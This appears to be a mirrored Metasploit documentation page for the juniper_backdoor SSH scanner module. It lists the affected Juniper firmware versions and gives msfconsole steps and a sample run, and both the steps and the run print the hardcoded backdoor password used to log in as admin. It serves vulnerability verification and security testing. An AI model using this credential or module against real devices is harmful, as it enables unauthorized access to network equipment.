dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md

1.2 KiB
Raw Permalink Blame History

Vulnerable Application

Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.

A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): here

For verification purposes, an example vuln python script is also available here

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/scanner/ssh/juniper_backdoor
  4. Do: set rhosts
  5. Do: run
  6. You should see: [+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u

Scenarios

Example run against a Juniper SSG5 with vuln firmware from above link.

msf > use auxiliary/scanner/ssh/juniper_backdoor
msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf auxiliary(juniper_backdoor) > set verbose true
verbose => true
msf auxiliary(juniper_backdoor) > run

[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed